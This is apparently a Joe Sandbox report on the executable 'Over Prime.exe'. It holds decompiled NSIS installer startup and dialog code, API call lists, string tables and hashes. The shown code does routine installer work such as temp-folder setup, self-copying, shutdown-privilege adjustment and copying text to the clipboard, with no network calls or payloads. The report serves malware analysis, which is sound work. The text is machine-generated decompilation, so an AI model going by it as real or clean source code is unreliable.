				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x433f00, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" ";
				E0040653D(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x434f00 = 0x400000;
				_t251 = L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M00440002;
				}
				_t199 = CharNextW(E00405E39(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x434f94 == _t189) {
														L77:
														_t120 =  *0x434fac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t189) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t265);
												goto L68;
											}
											_t219 = E00405E39(L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" ") {
													_t190 = E00405B08(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x441800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\Arthur\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x436800 = _t144;
														do {
															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Over Prime.exe", 0x42aa28, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062FD(_t202, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t153 = E00405B20(0x42aa28);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405F14(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp", _t222);
												E0040653D(0x441000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\Arthur\\Desktop\\Over Prime.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034FC(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034FC(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t199 = _t199 + 2;
						__eflags =  *_t199 - _t210;
					} while ( *_t199 == _t210);
					goto L17;
				}
				goto L37;
			}

0x0040353b
0x0040353c
0x00403543
0x00403546
0x0040354d
0x00403550
0x00403563
0x00403569
0x0040356c
0x0040356f
0x0040357d
0x00403585
0x00403590
0x004035a9
0x004035ab
0x004035b3
0x004035b3
0x004035be
0x004035c0
0x004035c0
0x004035d5
0x004035fa
0x00403608
0x0040360b
0x00403612
0x00403619
0x00403619
0x00403612
0x0040361b
0x00403620
0x00403621
0x0040362d
0x00403631
0x00403638
0x00403646
0x0040364b
0x00403652
0x00403656
0x0040365a
0x0040365c
0x0040365c
0x0040365a
0x00403663
0x0040366a
0x00403670
0x00403688
0x00403698
0x0040369d
0x004036a3
0x004036aa
0x004036b1
0x004036b3
0x004036b4
0x004036be
0x004036c5
0x004036c7
0x004036c9
0x004036c9
0x004036dc
0x004036de
0x004037d8
0x004037d8
0x004037db
0x004037de
0x00000000
0x00000000
0x004036e8
0x004036e9
0x004036ec
0x004036f5
0x004036f5
0x004036f8
0x004036fb
0x004036fe
0x00403701
0x00403701
0x00403701
0x00403702
0x00403706
0x004037c6
0x004037cf
0x004037d1
0x004037d4
0x004037d7
0x004037d7
0x004037d7
0x00000000
0x0040370c
0x0040370d
0x0040370e
0x00403712
0x0040372c
0x00403733
0x00403746
0x00403747
0x0040375c
0x00403761
0x00403763
0x00403765
0x00403781
0x00403788
0x0040379b
0x0040379c
0x004037b1
0x004037b7
0x004037b9
0x004037bb
0x004037c3
0x004037c5
0x00000000
0x004037c5
0x004037bf
0x004037c1
0x004037e6
0x004037ea
0x004037f3
0x004037f8
0x004037fe
0x00403809
0x0040380b
0x00403810
0x00403812
0x0040386a
0x0040386f
0x00403878
0x0040387f
0x00403882
0x00403a59
0x00403a59
0x00403a5e
0x00403a67
0x00403a84
0x00403afc
0x00403afc
0x00403b04
0x00403b06
0x00403b06
0x00403b0c
0x00403b0c
0x00403a9b
0x00403aa7
0x00403ab8
0x00403abf
0x00403ac6
0x00403ac6
0x00403ace
0x00403ada
0x00403ae8
0x00403af3
0x00000000
0x00000000
0x00000000
0x00403adc
0x00403adc
0x00403add
0x00403adf
0x00403ae0
0x00403ae1
0x00403ae6
0x00403af5
0x00403af7
0x00000000
0x00403af7
0x00000000
0x00403ae6
0x00403ada
0x00403a71
0x00403a78
0x00403a78
0x0040388e
0x00403935
0x00403935
0x00403941
0x00000000
0x00403941
0x0040389f
0x004038a7
0x004038f9
0x004038f9
0x004038ff
0x00403906
0x00403954
0x00403956
0x0040395b
0x0040395d
0x00403965
0x00403965
0x00403970
0x0040397c
0x00403982
0x00403984
0x00403a57
0x00403a57
0x00403a57
0x00000000
0x0040398a
0x0040398a
0x0040398c
0x0040398d
0x00403996
0x0040398f
0x0040398f
0x0040398f
0x0040399c
0x004039a4
0x004039ab
0x004039b3
0x004039b3
0x004039c0
0x004039cc
0x004039d6
0x004039d6
0x004039d8
0x004039df
0x004039e9
0x004039f5
0x004039fb
0x00403a01
0x00403a04
0x00403a0e
0x00403a14
0x00403a16
0x00403a1a
0x00403a2b
0x00403a31
0x00403a36
0x00403a38
0x00403a3b
0x00403a41
0x00403a41
0x00403a38
0x00403a16
0x00403a44
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a4b
0x00403a52
0x00000000
0x00403a52
0x00403984
0x00403908
0x0040390b
0x0040390f
0x00403914
0x00403916
0x00000000
0x00000000
0x00403922
0x0040392d
0x00403932
0x00000000
0x00403932
0x004038b0
0x004038c8
0x004038d9
0x004038da
0x004038de
0x004038e0
0x004038ee
0x004038f5
0x00000000
0x00000000
0x00000000
0x004038f5
0x004038f7
0x00000000
0x004038f7
0x0040381a
0x00403826
0x0040382b
0x00403830
0x00403832
0x00000000
0x00000000
0x0040383a
0x00403842
0x00403853
0x0040385b
0x0040385d
0x00403862
0x00403864
0x00000000
0x00000000
0x00000000
0x00403864
0x00000000
0x004037c1
0x0040376a
0x0040376c
0x00000000
0x00000000
0x0040376e
0x00403772
0x00403776
0x0040377d
0x0040377d
0x0040377d
0x0040377d
0x00000000
0x0040377d
0x00403778
0x0040377b
0x00000000
0x00000000
0x00000000
0x0040377b
0x00403714
0x00403718
0x0040371b
0x00403722
0x00403722
0x00000000
0x00403722
0x0040371d
0x00403720
0x00000000
0x00000000
0x00000000
0x00403720
0x00000000
0x00000000
0x00000000
0x004036ee
0x004036ee
0x004036ef
0x004036f0
0x004036f0
0x00000000
0x004036ee
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Over Prime.exe" ,00000020,"C:\Users\user\Desktop\Over Prime.exe" ,00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Over Prime.exe" ,00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\Desktop\Over Prime.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

SeShutdownPrivilege, xrefs: 00403AA1
Low, xrefs: 0040383C
\Temp, xrefs: 00403820
~nsu, xrefs: 0040394E
TMP, xrefs: 00403856
C:\Users\user\AppData\Local\Temp, xrefs: 004037EE, 0040391D, 004039A4, 004039AE
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
Error launching installer, xrefs: 004038FF
.tmp, xrefs: 0040396A
UXTHEME, xrefs: 0040361B, 00403620, 00403626
1033, xrefs: 0040386A
"C:\Users\user\Desktop\Over Prime.exe" , xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
TEMP, xrefs: 0040384E
C:\Users\user\Desktop\Over Prime.exe, xrefs: 00403A09
NSIS Error, xrefs: 0040368E

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Over Prime.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Over Prime.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-2603615043
Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0xb004e
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434f8c - _t156;
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x51100c
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004056e6
0x004056ec
0x004056f6
0x004056f9
0x00405888
0x0040588f
0x004058ac
0x004058b3
0x004058b3
0x004058b9
0x004058c6
0x004058e4
0x004058e6
0x004058e7
0x004058ee
0x00405944
0x00405944
0x00405948
0x00000000
0x00000000
0x0040594a
0x0040594d
0x00405950
0x00000000
0x00000000
0x0040595a
0x00405960
0x00405962
0x00405965
0x00405a67
0x00000000
0x00405a67
0x00405974
0x0040597f
0x00405988
0x0040598f
0x00405993
0x00405996
0x0040599f
0x004059a5
0x004059a8
0x004059a8
0x004059b8
0x004059be
0x004059c0
0x004059c9
0x004059cc
0x004059d3
0x004059da
0x004059e2
0x004059e2
0x004059f0
0x004059f6
0x004059f9
0x004059f9
0x00405a00
0x00405a06
0x00405a12
0x00405a19
0x00405a22
0x00405a24
0x00405a27
0x00405a36
0x00405a39
0x00405a3f
0x00405a40
0x00405a46
0x00405a47
0x00405a48
0x00405a48
0x00405a50
0x00405a5b
0x00405a61
0x00405a61
0x00000000
0x004059c0
0x004058f0
0x004058f6
0x00405926
0x00405928
0x0040592e
0x00405930
0x00405939
0x00405939
0x0040593f
0x00000000
0x0040593f
0x004058fa
0x00405904
0x00000000
0x004058c8
0x004058c8
0x004058ce
0x00405909
0x00000000
0x00405912
0x004058d7
0x004058dc
0x004058df
0x00000000
0x004058df
0x004058c6
0x004056ff
0x00405703
0x0040570b
0x0040570f
0x00405712
0x00405715
0x00405718
0x0040571b
0x0040571c
0x0040571d
0x00405736
0x00405739
0x00405743
0x00405752
0x0040575a
0x00405762
0x00405767
0x0040576a
0x00405776
0x0040577f
0x00405788
0x004057aa
0x004057b0
0x004057c1
0x004057c6
0x004057d4
0x004057e2
0x004057e2
0x004057e7
0x004057f5
0x004057f5
0x004057fa
0x004057fd
0x00405802
0x0040580e
0x00405817
0x00405824
0x00405833
0x00405826
0x0040582b
0x0040582b
0x0040583f
0x0040583f
0x00405853
0x0040585c
0x00405865
0x00405875
0x00405881
0x00405881
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
